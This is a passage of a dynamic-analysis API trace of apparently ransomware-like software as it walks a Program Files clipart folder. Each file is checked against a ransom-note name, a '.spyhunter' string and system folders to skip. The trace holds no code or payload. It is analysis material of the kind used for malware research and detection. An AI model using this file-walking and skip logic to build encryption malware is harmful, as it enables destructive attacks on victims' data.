Office\\CLIPART\\PUB60COR\\J0105282.WMF") returned 67 [0098.185] GetProcessHeap () returned 0x2c0000 [0098.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38d3d8 [0098.185] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x23c8) returned 0x2c16890 [0098.185] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.185] lstrcmpiW (lpString1="J0105286.WMF", lpString2="Windows") returned -1 [0098.185] lstrlenW (lpString="Windows") returned 7 [0098.185] lstrcmpiW (lpString1="J0105286.WMF", lpString2="$Recycle.bin") returned 1 [0098.185] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.185] lstrcmpiW (lpString1="J0105286.WMF", lpString2="System Volume Information") returned -1 [0098.185] lstrlenW (lpString="System Volume Information") returned 25 [0098.185] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105286.WMF") returned 67 [0098.185] StrStrIW (lpFirst="J0105286.WMF", lpSrch=".spyhunter") returned 0x0 [0098.186] lstrcmpW (lpString1="J0105286.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.186] lstrcmpW (lpString1="J0105286.WMF", lpString2="_uninstalling_.png") returned 1 [0098.186] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105286.WMF") returned 67 [0098.186] GetProcessHeap () returned 0x2c0000 [0098.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38d4a8 [0098.186] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x23d0) returned 0x2c16890 [0098.186] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.186] lstrcmpiW (lpString1="J0105288.WMF", lpString2="Windows") returned -1 [0098.186] lstrlenW (lpString="Windows") returned 7 [0098.186] lstrcmpiW (lpString1="J0105288.WMF", lpString2="$Recycle.bin") returned 1 [0098.186] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.186] lstrcmpiW (lpString1="J0105288.WMF", lpString2="System Volume Information") returned -1 [0098.186] lstrlenW (lpString="System Volume Information") returned 25 [0098.186] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105288.WMF") returned 67 [0098.186] StrStrIW (lpFirst="J0105288.WMF", lpSrch=".spyhunter") returned 0x0 [0098.186] lstrcmpW (lpString1="J0105288.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.186] lstrcmpW (lpString1="J0105288.WMF", lpString2="_uninstalling_.png") returned 1 [0098.186] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105288.WMF") returned 67 [0098.186] GetProcessHeap () returned 0x2c0000 [0098.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38d578 [0098.186] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x23d8) returned 0x2c16890 [0098.187] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.187] lstrcmpiW (lpString1="J0105292.WMF", lpString2="Windows") returned -1 [0098.187] lstrlenW (lpString="Windows") returned 7 [0098.187] lstrcmpiW (lpString1="J0105292.WMF", lpString2="$Recycle.bin") returned 1 [0098.187] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.187] lstrcmpiW (lpString1="J0105292.WMF", lpString2="System Volume Information") returned -1 [0098.187] lstrlenW (lpString="System Volume Information") returned 25 [0098.187] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105292.WMF") returned 67 [0098.187] StrStrIW (lpFirst="J0105292.WMF", lpSrch=".spyhunter") returned 0x0 [0098.187] lstrcmpW (lpString1="J0105292.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.187] lstrcmpW (lpString1="J0105292.WMF", lpString2="_uninstalling_.png") returned 1 [0098.187] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105292.WMF") returned 67 [0098.187] GetProcessHeap () returned 0x2c0000 [0098.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38d648 [0098.187] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x23e0) returned 0x2c16890 [0098.187] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.187] lstrcmpiW (lpString1="J0105294.WMF", lpString2="Windows") returned -1 [0098.187] lstrlenW (lpString="Windows") returned 7 [0098.188] lstrcmpiW (lpString1="J0105294.WMF", lpString2="$Recycle.bin") returned 1 [0098.189] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.189] lstrcmpiW (lpString1="J0105294.WMF", lpString2="System Volume Information") returned -1 [0098.189] lstrlenW (lpString="System Volume Information") returned 25 [0098.189] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105294.WMF") returned 67 [0098.189] StrStrIW (lpFirst="J0105294.WMF", lpSrch=".spyhunter") returned 0x0 [0098.189] lstrcmpW (lpString1="J0105294.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.189] lstrcmpW (lpString1="J0105294.WMF", lpString2="_uninstalling_.png") returned 1 [0098.189] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105294.WMF") returned 67 [0098.189] GetProcessHeap () returned 0x2c0000 [0098.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38d718 [0098.189] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x23e8) returned 0x2c16890 [0098.189] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.189] lstrcmpiW (lpString1="J0105298.WMF", lpString2="Windows") returned -1 [0098.189] lstrlenW (lpString="Windows") returned 7 [0098.189] lstrcmpiW (lpString1="J0105298.WMF", lpString2="$Recycle.bin") returned 1 [0098.189] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.189] lstrcmpiW (lpString1="J0105298.WMF", lpString2="System Volume Information") returned -1 [0098.189] lstrlenW (lpString="System Volume Information") returned 25 [0098.189] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105298.WMF") returned 67 [0098.189] StrStrIW (lpFirst="J0105298.WMF", lpSrch=".spyhunter") returned 0x0 [0098.189] lstrcmpW (lpString1="J0105298.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.189] lstrcmpW (lpString1="J0105298.WMF", lpString2="_uninstalling_.png") returned 1 [0098.190] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105298.WMF") returned 67 [0098.190] GetProcessHeap () returned 0x2c0000 [0098.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38d7e8 [0098.190] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x23f0) returned 0x2c16890 [0098.190] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.190] lstrcmpiW (lpString1="J0105306.WMF", lpString2="Windows") returned -1 [0098.190] lstrlenW (lpString="Windows") returned 7 [0098.190] lstrcmpiW (lpString1="J0105306.WMF", lpString2="$Recycle.bin") returned 1 [0098.190] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.190] lstrcmpiW (lpString1="J0105306.WMF", lpString2="System Volume Information") returned -1 [0098.190] lstrlenW (lpString="System Volume Information") returned 25 [0098.190] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105306.WMF") returned 67 [0098.190] StrStrIW (lpFirst="J0105306.WMF", lpSrch=".spyhunter") returned 0x0 [0098.190] lstrcmpW (lpString1="J0105306.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.190] lstrcmpW (lpString1="J0105306.WMF", lpString2="_uninstalling_.png") returned 1 [0098.190] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105306.WMF") returned 67 [0098.190] GetProcessHeap () returned 0x2c0000 [0098.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38d8b8 [0098.190] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x23f8) returned 0x2c16890 [0098.190] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.190] lstrcmpiW (lpString1="J0105320.WMF", lpString2="Windows") returned -1 [0098.191] lstrlenW (lpString="Windows") returned 7 [0098.191] lstrcmpiW (lpString1="J0105320.WMF", lpString2="$Recycle.bin") returned 1 [0098.191] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.191] lstrcmpiW (lpString1="J0105320.WMF", lpString2="System Volume Information") returned -1 [0098.191] lstrlenW (lpString="System Volume Information") returned 25 [0098.191] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105320.WMF") returned 67 [0098.191] StrStrIW (lpFirst="J0105320.WMF", lpSrch=".spyhunter") returned 0x0 [0098.191] lstrcmpW (lpString1="J0105320.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.191] lstrcmpW (lpString1="J0105320.WMF", lpString2="_uninstalling_.png") returned 1 [0098.191] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105320.WMF") returned 67 [0098.191] GetProcessHeap () returned 0x2c0000 [0098.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38d988 [0098.191] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2400) returned 0x2c16890 [0098.191] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.191] lstrcmpiW (lpString1="J0105328.WMF", lpString2="Windows") returned -1 [0098.191] lstrlenW (lpString="Windows") returned 7 [0098.191] lstrcmpiW (lpString1="J0105328.WMF", lpString2="$Recycle.bin") returned 1 [0098.191] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.191] lstrcmpiW (lpString1="J0105328.WMF", lpString2="System Volume Information") returned -1 [0098.191] lstrlenW (lpString="System Volume Information") returned 25 [0098.191] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF") returned 67 [0098.191] StrStrIW (lpFirst="J0105328.WMF", lpSrch=".spyhunter") returned 0x0 [0098.192] lstrcmpW (lpString1="J0105328.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.192] lstrcmpW (lpString1="J0105328.WMF", lpString2="_uninstalling_.png") returned 1 [0098.192] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF") returned 67 [0098.192] GetProcessHeap () returned 0x2c0000 [0098.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38da58 [0098.192] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2408) returned 0x2c16890 [0098.192] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.192] lstrcmpiW (lpString1="J0105332.WMF", lpString2="Windows") returned -1 [0098.192] lstrlenW (lpString="Windows") returned 7 [0098.192] lstrcmpiW (lpString1="J0105332.WMF", lpString2="$Recycle.bin") returned 1 [0098.192] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.192] lstrcmpiW (lpString1="J0105332.WMF", lpString2="System Volume Information") returned -1 [0098.192] lstrlenW (lpString="System Volume Information") returned 25 [0098.192] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF") returned 67 [0098.192] StrStrIW (lpFirst="J0105332.WMF", lpSrch=".spyhunter") returned 0x0 [0098.192] lstrcmpW (lpString1="J0105332.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.192] lstrcmpW (lpString1="J0105332.WMF", lpString2="_uninstalling_.png") returned 1 [0098.192] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF") returned 67 [0098.192] GetProcessHeap () returned 0x2c0000 [0098.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38db28 [0098.192] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2410) returned 0x2c16890 [0098.193] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.193] lstrcmpiW (lpString1="J0105336.WMF", lpString2="Windows") returned -1 [0098.193] lstrlenW (lpString="Windows") returned 7 [0098.193] lstrcmpiW (lpString1="J0105336.WMF", lpString2="$Recycle.bin") returned 1 [0098.193] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.193] lstrcmpiW (lpString1="J0105336.WMF", lpString2="System Volume Information") returned -1 [0098.193] lstrlenW (lpString="System Volume Information") returned 25 [0098.193] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF") returned 67 [0098.193] StrStrIW (lpFirst="J0105336.WMF", lpSrch=".spyhunter") returned 0x0 [0098.193] lstrcmpW (lpString1="J0105336.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.193] lstrcmpW (lpString1="J0105336.WMF", lpString2="_uninstalling_.png") returned 1 [0098.193] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF") returned 67 [0098.193] GetProcessHeap () returned 0x2c0000 [0098.193] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38dbf8 [0098.193] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2418) returned 0x2c16890 [0098.193] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.193] lstrcmpiW (lpString1="J0105338.WMF", lpString2="Windows") returned -1 [0098.193] lstrlenW (lpString="Windows") returned 7 [0098.193] lstrcmpiW (lpString1="J0105338.WMF", lpString2="$Recycle.bin") returned 1 [0098.193] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.193] lstrcmpiW (lpString1="J0105338.WMF", lpString2="System Volume Information") returned -1 [0098.193] lstrlenW (lpString="System Volume Information") returned 25 [0098.194] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF") returned 67 [0098.194] StrStrIW (lpFirst="J0105338.WMF", lpSrch=".spyhunter") returned 0x0 [0098.194] lstrcmpW (lpString1="J0105338.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.194] lstrcmpW (lpString1="J0105338.WMF", lpString2="_uninstalling_.png") returned 1 [0098.194] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF") returned 67 [0098.194] GetProcessHeap () returned 0x2c0000 [0098.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38dcc8 [0098.194] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2420) returned 0x2c16890 [0098.194] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.196] lstrcmpiW (lpString1="J0105348.WMF", lpString2="Windows") returned -1 [0098.196] lstrlenW (lpString="Windows") returned 7 [0098.196] lstrcmpiW (lpString1="J0105348.WMF", lpString2="$Recycle.bin") returned 1 [0098.196] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.196] lstrcmpiW (lpString1="J0105348.WMF", lpString2="System Volume Information") returned -1 [0098.196] lstrlenW (lpString="System Volume Information") returned 25 [0098.196] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105348.WMF") returned 67 [0098.196] StrStrIW (lpFirst="J0105348.WMF", lpSrch=".spyhunter") returned 0x0 [0098.196] lstrcmpW (lpString1="J0105348.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.196] lstrcmpW (lpString1="J0105348.WMF", lpString2="_uninstalling_.png") returned 1 [0098.196] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105348.WMF") returned 67 [0098.196] GetProcessHeap () returned 0x2c0000 [0098.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38dd98 [0098.196] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2428) returned 0x2c16890 [0098.196] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.196] lstrcmpiW (lpString1="J0105360.WMF", lpString2="Windows") returned -1 [0098.196] lstrlenW (lpString="Windows") returned 7 [0098.196] lstrcmpiW (lpString1="J0105360.WMF", lpString2="$Recycle.bin") returned 1 [0098.197] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.197] lstrcmpiW (lpString1="J0105360.WMF", lpString2="System Volume Information") returned -1 [0098.197] lstrlenW (lpString="System Volume Information") returned 25 [0098.197] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105360.WMF") returned 67 [0098.197] StrStrIW (lpFirst="J0105360.WMF", lpSrch=".spyhunter") returned 0x0 [0098.197] lstrcmpW (lpString1="J0105360.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.197] lstrcmpW (lpString1="J0105360.WMF", lpString2="_uninstalling_.png") returned 1 [0098.197] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105360.WMF") returned 67 [0098.197] GetProcessHeap () returned 0x2c0000 [0098.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38de68 [0098.197] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2430) returned 0x2c16890 [0098.197] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.197] lstrcmpiW (lpString1="J0105368.WMF", lpString2="Windows") returned -1 [0098.197] lstrlenW (lpString="Windows") returned 7 [0098.197] lstrcmpiW (lpString1="J0105368.WMF", lpString2="$Recycle.bin") returned 1 [0098.197] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.197] lstrcmpiW (lpString1="J0105368.WMF", lpString2="System Volume Information") returned -1 [0098.197] lstrlenW (lpString="System Volume Information") returned 25 [0098.197] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105368.WMF") returned 67 [0098.197] StrStrIW (lpFirst="J0105368.WMF", lpSrch=".spyhunter") returned 0x0 [0098.197] lstrcmpW (lpString1="J0105368.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.198] lstrcmpW (lpString1="J0105368.WMF", lpString2="_uninstalling_.png") returned 1 [0098.198] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105368.WMF") returned 67 [0098.198] GetProcessHeap () returned 0x2c0000 [0098.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38df38 [0098.198] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2438) returned 0x2c16890 [0098.198] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.198] lstrcmpiW (lpString1="J0105376.WMF", lpString2="Windows") returned -1 [0098.198] lstrlenW (lpString="Windows") returned 7 [0098.198] lstrcmpiW (lpString1="J0105376.WMF", lpString2="$Recycle.bin") returned 1 [0098.198] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.198] lstrcmpiW (lpString1="J0105376.WMF", lpString2="System Volume Information") returned -1 [0098.198] lstrlenW (lpString="System Volume Information") returned 25 [0098.198] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105376.WMF") returned 67 [0098.198] StrStrIW (lpFirst="J0105376.WMF", lpSrch=".spyhunter") returned 0x0 [0098.198] lstrcmpW (lpString1="J0105376.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.198] lstrcmpW (lpString1="J0105376.WMF", lpString2="_uninstalling_.png") returned 1 [0098.198] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105376.WMF") returned 67 [0098.198] GetProcessHeap () returned 0x2c0000 [0098.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38e008 [0098.198] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2440) returned 0x2c16890 [0098.198] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.199] lstrcmpiW (lpString1="J0105378.WMF", lpString2="Windows") returned -1 [0098.199] lstrlenW (lpString="Windows") returned 7 [0098.199] lstrcmpiW (lpString1="J0105378.WMF", lpString2="$Recycle.bin") returned 1 [0098.199] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.199] lstrcmpiW (lpString1="J0105378.WMF", lpString2="System Volume Information") returned -1 [0098.199] lstrlenW (lpString="System Volume Information") returned 25 [0098.199] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105378.WMF") returned 67 [0098.199] StrStrIW (lpFirst="J0105378.WMF", lpSrch=".spyhunter") returned 0x0 [0098.199] lstrcmpW (lpString1="J0105378.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.199] lstrcmpW (lpString1="J0105378.WMF", lpString2="_uninstalling_.png") returned 1 [0098.199] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105378.WMF") returned 67 [0098.199] GetProcessHeap () returned 0x2c0000 [0098.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38e0d8 [0098.199] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2448) returned 0x2c16890 [0098.199] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.199] lstrcmpiW (lpString1="J0105380.WMF", lpString2="Windows") returned -1 [0098.200] lstrlenW (lpString="Windows") returned 7 [0098.200] lstrcmpiW (lpString1="J0105380.WMF", lpString2="$Recycle.bin") returned 1 [0098.200] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.200] lstrcmpiW (lpString1="J0105380.WMF", lpString2="System Volume Information") returned -1 [0098.200] lstrlenW (lpString="System Volume Information") returned 25 [0098.200] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105380.WMF") returned 67 [0098.200] StrStrIW (lpFirst="J0105380.WMF", lpSrch=".spyhunter") returned 0x0 [0098.200] lstrcmpW (lpString1="J0105380.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.200] lstrcmpW (lpString1="J0105380.WMF", lpString2="_uninstalling_.png") returned 1 [0098.200] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105380.WMF") returned 67 [0098.200] GetProcessHeap () returned 0x2c0000 [0098.200] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38e1a8 [0098.200] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2450) returned 0x2c16890 [0098.200] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.200] lstrcmpiW (lpString1="J0105384.WMF", lpString2="Windows") returned -1 [0098.200] lstrlenW (lpString="Windows") returned 7 [0098.200] lstrcmpiW (lpString1="J0105384.WMF", lpString2="$Recycle.bin") returned 1 [0098.200] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.200] lstrcmpiW (lpString1="J0105384.WMF", lpString2="System Volume Information") returned -1 [0098.200] lstrlenW (lpString="System Volume Information") returned 25 [0098.200] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105384.WMF") returned 67 [0098.201] StrStrIW (lpFirst="J0105384.WMF", lpSrch=".spyhunter") returned 0x0 [0098.201] lstrcmpW (lpString1="J0105384.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.201] lstrcmpW (lpString1="J0105384.WMF", lpString2="_uninstalling_.png") returned 1 [0098.201] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105384.WMF") returned 67 [0098.201] GetProcessHeap () returned 0x2c0000 [0098.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38e278 [0098.201] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2458) returned 0x2c16890 [0098.201] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.201] lstrcmpiW (lpString1="J0105386.WMF", lpString2="Windows") returned -1 [0098.201] lstrlenW (lpString="Windows") returned 7 [0098.201] lstrcmpiW (lpString1="J0105386.WMF", lpString2="$Recycle.bin") returned 1 [0098.201] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.201] lstrcmpiW (lpString1="J0105386.WMF", lpString2="System Volume Information") returned -1 [0098.201] lstrlenW (lpString="System Volume Information") returned 25 [0098.201] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105386.WMF") returned 67 [0098.201] StrStrIW (lpFirst="J0105386.WMF", lpSrch=".spyhunter") returned 0x0 [0098.201] lstrcmpW (lpString1="J0105386.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.201] lstrcmpW (lpString1="J0105386.WMF", lpString2="_uninstalling_.png") returned 1 [0098.201] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105386.WMF") returned 67 [0098.201] GetProcessHeap () returned 0x2c0000 [0098.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38e348 [0098.201] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2460) returned 0x2c16890 [0098.202] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.202] lstrcmpiW (lpString1="J0105388.WMF", lpString2="Windows") returned -1 [0098.202] lstrlenW (lpString="Windows") returned 7 [0098.202] lstrcmpiW (lpString1="J0105388.WMF", 